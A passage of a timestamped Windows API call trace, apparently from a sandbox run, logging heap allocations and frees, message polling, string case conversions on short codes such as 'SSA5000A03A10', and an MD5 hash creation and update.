0x34aa448 [0162.081] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.081] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0162.081] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0162.081] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0162.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0162.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0162.081] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0162.081] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.081] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0162.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0162.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0162.082] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.082] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.082] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0162.082] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0162.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0162.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0162.082] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.082] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0162.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0162.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0162.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0162.082] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.082] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.083] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0162.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0162.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0162.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0162.083] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0162.083] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0162.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0162.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0162.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0162.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0162.083] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0162.083] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.083] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0162.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0162.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0162.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0162.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0162.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0162.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0162.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0162.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0162.084] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0162.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0162.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0162.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0162.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0162.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0162.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0162.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0162.084] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0162.085] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.085] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0162.085] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0162.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0162.086] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0162.086] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0162.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0162.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0162.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0162.087] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0162.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0162.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0162.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0162.087] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.087] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0162.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0162.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0162.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0162.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0162.087] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.087] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.087] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0162.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0162.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0162.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0162.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0162.088] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0162.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0162.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0162.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0162.088] CryptHashData (hHash=0xaa5660, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0162.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0162.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0162.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0162.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0162.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0162.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0162.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0162.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0162.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0162.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0162.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0162.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0162.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0162.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0162.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0162.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0162.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0162.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0162.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0162.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0162.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0162.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0162.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0162.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0162.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0162.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0162.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0162.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0162.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0162.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0162.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0162.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0162.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0162.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0162.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0162.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0162.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0162.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0162.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0162.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0162.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0162.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0162.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0162.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0162.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0162.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0162.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0162.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0162.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0162.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0162.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0162.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0162.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0162.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0162.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0162.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0162.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0162.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0162.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0162.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0162.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0162.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0162.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0162.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0162.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0162.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0162.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0162.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) 